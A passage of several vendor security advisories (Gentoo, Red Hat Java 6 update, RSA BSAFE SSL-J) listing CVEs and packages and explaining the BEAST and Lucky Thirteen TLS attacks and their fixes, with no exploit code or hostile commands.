http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3956 [ 433 ] CVE-2012-3957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3957 [ 434 ] CVE-2012-3958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3958 [ 435 ] CVE-2012-3959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3959 [ 436 ] CVE-2012-3960 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3960 [ 437 ] CVE-2012-3961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3961 [ 438 ] CVE-2012-3962 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3962 [ 439 ] CVE-2012-3963 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3963 [ 440 ] CVE-2012-3964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3964 [ 441 ] CVE-2012-3965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3965 [ 442 ] CVE-2012-3966 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3966 [ 443 ] CVE-2012-3967 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3967 [ 444 ] CVE-2012-3968 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3968 [ 445 ] CVE-2012-3969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3969 [ 446 ] CVE-2012-3970 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3970 [ 447 ] CVE-2012-3971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3971 [ 448 ] CVE-2012-3972 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3972 [ 449 ] CVE-2012-3973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3973 [ 450 ] CVE-2012-3975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3975 [ 451 ] CVE-2012-3976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3976 [ 452 ] CVE-2012-3977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3977 [ 453 ] CVE-2012-3978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3978 [ 454 ] CVE-2012-3980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3980 [ 455 ] CVE-2012-3982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3982 [ 456 ] CVE-2012-3984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3984 [ 457 ] CVE-2012-3985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3985 [ 458 ] CVE-2012-3986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3986 [ 459 ] CVE-2012-3988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3988 [ 460 ] CVE-2012-3989 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3989 [ 461 ] CVE-2012-3990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3990 [ 462 ] CVE-2012-3991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3991 [ 463 ] CVE-2012-3992 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3992 [ 464 ] CVE-2012-3993 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3993 [ 465 ] CVE-2012-3994 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3994 [ 466 ] CVE-2012-3995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3995 [ 467 ] CVE-2012-4179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4179 [ 468 ] CVE-2012-4180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4180 [ 469 ] CVE-2012-4181 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4181 [ 470 ] CVE-2012-4182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4182 [ 471 ] CVE-2012-4183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4183 [ 472 ] CVE-2012-4184 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4184 [ 473 ] CVE-2012-4185 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4185 [ 474 ] CVE-2012-4186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4186 [ 475 ] CVE-2012-4187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4187 [ 476 ] CVE-2012-4188 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4188 [ 477 ] CVE-2012-4190 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4190 [ 478 ] CVE-2012-4191 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4191 [ 479 ] CVE-2012-4192 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4192 [ 480 ] CVE-2012-4193 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4193 [ 481 ] CVE-2012-4194 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4194 [ 482 ] CVE-2012-4195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4195 [ 483 ] CVE-2012-4196 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4196 [ 484 ] CVE-2012-4201 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4201 [ 485 ] CVE-2012-4202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4202 [ 486 ] CVE-2012-4204 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4204 [ 487 ] CVE-2012-4205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4205 [ 488 ] CVE-2012-4206 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4206 [ 489 ] CVE-2012-4207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4207 [ 490 ] CVE-2012-4208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4208 [ 491 ] CVE-2012-4209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4209 [ 492 ] CVE-2012-4210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4210 [ 493 ] CVE-2012-4212 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4212 [ 494 ] CVE-2012-4215 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4215 [ 495 ] CVE-2012-4216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4216 [ 496 ] CVE-2012-5354 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5354 [ 497 ] CVE-2012-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5829 [ 498 ] CVE-2012-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5830 [ 499 ] CVE-2012-5833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5833 [ 500 ] CVE-2012-5835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5835 [ 501 ] CVE-2012-5836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5836 [ 502 ] CVE-2012-5838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5838 [ 503 ] CVE-2012-5839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5839 [ 504 ] CVE-2012-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5840 [ 505 ] CVE-2012-5841 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5841 [ 506 ] CVE-2012-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5842 [ 507 ] CVE-2012-5843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5843 [ 508 ] Firefox Blocking Fraudulent Certificates http://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-c= ertificates/ [ 509 ] Mozilla Foundation Security Advisory 2011-11 http://www.mozilla.org/security/announce/2011/mfsa2011-11.html [ 510 ] Mozilla Foundation Security Advisory 2011-34 http://www.mozilla.org/security/announce/2011/mfsa2011-34.html Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201301-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: java-1.6.0-sun security update Advisory ID: RHSA-2011:1384-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1384.html Issue date: 2011-10-19 CVE Names: CVE-2011-3389 CVE-2011-3516 CVE-2011-3521 CVE-2011-3544 CVE-2011-3545 CVE-2011-3546 CVE-2011-3547 CVE-2011-3548 CVE-2011-3549 CVE-2011-3550 CVE-2011-3551 CVE-2011-3552 CVE-2011-3553 CVE-2011-3554 CVE-2011-3555 CVE-2011-3556 CVE-2011-3557 CVE-2011-3558 CVE-2011-3560 CVE-2011-3561 ===================================================================== 1. Summary: Updated java-1.6.0-sun packages that fix several security issues are now available for Red Hat Enterprise Linux 4 Extras, and Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. 2. Relevant releases/architectures: Red Hat Desktop version 4 Extras - i386, x86_64 Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The Sun 1.6.0 Java release includes the Sun Java 6 Runtime Environment and the Sun Java 6 Software Development Kit. This update fixes several vulnerabilities in the Sun Java 6 Runtime Environment and the Sun Java 6 Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch page, listed in the References section. (CVE-2011-3389, CVE-2011-3516, CVE-2011-3521, CVE-2011-3544, CVE-2011-3545, CVE-2011-3546, CVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3550, CVE-2011-3551, CVE-2011-3552, CVE-2011-3553, CVE-2011-3554, CVE-2011-3555, CVE-2011-3556, CVE-2011-3557, CVE-2011-3558, CVE-2011-3560, CVE-2011-3561) All users of java-1.6.0-sun are advised to upgrade to these updated packages, which provide JDK and JRE 6 Update 29 and resolve these issues. All running instances of Sun Java must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 737506 - CVE-2011-3389 HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST) 745379 - CVE-2011-3560 OpenJDK: missing checkSetFactory calls in HttpsURLConnection (JSSE, 7096936) 745387 - CVE-2011-3547 OpenJDK: InputStream skip() information leak (Networking/IO, 7000600) 745391 - CVE-2011-3551 OpenJDK: Java2D TransformHelper integer overflow (2D, 7023640) 745397 - CVE-2011-3552 OpenJDK: excessive default UDP socket limit under SecurityManager (Networking, 7032417) 745399 - CVE-2011-3544 OpenJDK: missing SecurityManager checks in scripting engine (Scripting, 7046823) 745442 - CVE-2011-3521 OpenJDK: IIOP deserialization code execution (Deserialization, 7055902) 745447 - CVE-2011-3554 OpenJDK: insufficient pack200 JAR files uncompress error checks (Runtime, 7057857) 745459 - CVE-2011-3556 OpenJDK: RMI DGC server remote code execution (RMI, 7077466) 745464 - CVE-2011-3557 OpenJDK: RMI registry privileged code execution (RMI, 7083012) 745473 - CVE-2011-3548 OpenJDK: mutable static AWTKeyStroke.ctor (AWT, 7019773) 745476 - CVE-2011-3553 OpenJDK: JAX-WS stack-traces information leak (JAX-WS, 7046794) 745492 - CVE-2011-3558 OpenJDK: Hotspot unspecified issue (Hotspot, 7070134) 747191 - CVE-2011-3545 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Sound) 747198 - CVE-2011-3549 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Swing) 747200 - CVE-2011-3550 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (AWT) 747203 - CVE-2011-3516 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment) 747205 - CVE-2011-3546 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment) 747206 - CVE-2011-3555 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (JRE) 747208 - CVE-2011-3561 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment) 6. Package List: Red Hat Enterprise Linux AS version 4 Extras: i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.x86_64.rpm Red Hat Desktop version 4 Extras: i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux ES version 4 Extras: i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux WS version 4 Extras: i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.x86_64.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.i686.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux HPC Node Supplementary (v. 6): x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.i686.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.i686.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-3389.html https://www.redhat.com/security/data/cve/CVE-2011-3516.html https://www.redhat.com/security/data/cve/CVE-2011-3521.html https://www.redhat.com/security/data/cve/CVE-2011-3544.html https://www.redhat.com/security/data/cve/CVE-2011-3545.html https://www.redhat.com/security/data/cve/CVE-2011-3546.html https://www.redhat.com/security/data/cve/CVE-2011-3547.html https://www.redhat.com/security/data/cve/CVE-2011-3548.html https://www.redhat.com/security/data/cve/CVE-2011-3549.html https://www.redhat.com/security/data/cve/CVE-2011-3550.html https://www.redhat.com/security/data/cve/CVE-2011-3551.html https://www.redhat.com/security/data/cve/CVE-2011-3552.html https://www.redhat.com/security/data/cve/CVE-2011-3553.html https://www.redhat.com/security/data/cve/CVE-2011-3554.html https://www.redhat.com/security/data/cve/CVE-2011-3555.html https://www.redhat.com/security/data/cve/CVE-2011-3556.html https://www.redhat.com/security/data/cve/CVE-2011-3557.html https://www.redhat.com/security/data/cve/CVE-2011-3558.html https://www.redhat.com/security/data/cve/CVE-2011-3560.html https://www.redhat.com/security/data/cve/CVE-2011-3561.html https://access.redhat.com/security/updates/classification/#critical http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2011 Red Hat, Inc. To implement first block splitting in RSA BSAFE Micro Edition Suite 4.0, either for an SSL context or SSL object, call R_SSL_CTX_set_options_by_type() or R_SSL_set_options_by_type() respectively, with the SSL_OP_TYPE_SECURITY option type and the SSL_OP_SPLIT_FIRST_FRAGMENT identifier. For more information about these functions and identifiers, see the RSA BSAFE Micro Edition Suite API Reference Guide. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2013-039: RSA BSAFE\xae SSL-J Multiple Vulnerabilities EMC Identifier: ESA-2013-039 CVE Identifier: CVE-2011-3389, CVE-2013-0169 Severity Rating: CVSS v2 Base Score: Refer NVD (http://nvd.nist.gov/) for individual scores for each CVE Affected Products: All versions of RSA BSAFE SSL-J except for 6.0.1 and 5.1.2 Unaffected Products: RSA BSAFE SSL-J 6.0.1 and 5.1.2 (newly released) Summary: RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain updates designed to prevent BEAST attacks (CVE-2011-3389) and SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks (CVE-2013-0169). Details: BEAST There is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important. The BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time. Lucky Thirteen Researchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS. The \x93Lucky Thirteen\x94 attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Details of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf Recommendation: RSA recommends that customers on RSA BSAFE SSL-J 5.1.x or lower upgrade to RSA BSAFE SSL-J 5.1.2. RSA recommends that customers on RSA BSAFE SSL-J 6.0 upgrade to RSA BSAFE SSL-J 6.0.1. To address BEAST, RSA introduce a new feature called first block splitting to RSA BSAFE SSL-J 6.0.1 and 5.1.2. First block splitting is designed to prevent the BEAST exploit by introducing unknown data into the encryption scheme prior to the attackers inserted plain text data. This is done as follows: \x951. The first plain text block to be encrypted is split into two blocks. The first block contains the first byte of the data, the second block contains the rest. \x952. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block. \x953. The one byte of data, along with the MAC, is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own. For RSA BSAFE SSL-J 6.0.1 and 5.1.2, first block splitting is engineered to be enabled by default for vulnerable cipher suites, making the application secure by default. If required, the application can disable first block splitting by setting the system property jsse.enableCBCProtection: \x95 Using the following Java code: System.setProperty("jsse.enableCBCProtection", "false"); OR \x95 On the Java command line, passing the following argument: -Djsse.enableCBCProtection=\x94false\x94 For more information about setting security properties, see section System and Security Properties in the RSA BSAFE SSL-J Developer Guide. The best way to help prevent the BEAST attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues. A second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security. To address Lucky Thirteen, RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain a patch that is designed to help ensure that MAC checking is time invariant in servers. Customers can also protect against the Lucky Thirteen attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used. Obtaining Downloads: To request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.rsa.com/node.aspx?id=1356 ) for most expedient service. You may also request your software upgrade online at http://www.rsa.com/go/form_ins.asp . Obtaining 